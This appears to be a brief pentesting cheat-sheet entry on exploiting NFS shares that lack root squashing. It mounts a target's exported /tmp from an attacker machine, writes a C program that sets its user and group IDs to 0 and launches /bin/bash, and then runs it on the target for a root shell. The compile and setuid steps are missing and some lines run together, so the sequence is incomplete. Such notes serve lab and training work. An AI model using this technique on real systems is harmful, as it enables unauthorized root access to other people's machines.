NFS Root Squashing
Enumeration
Exploitation
In our attacking machine
mkdir /tmp/1
mount -o rw,vers=2 10.10.32.193:/tmp /tmp/1
we mount our folderecho 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/1/x.c
In our target
/tmp/x
we can execute our binary
Last updated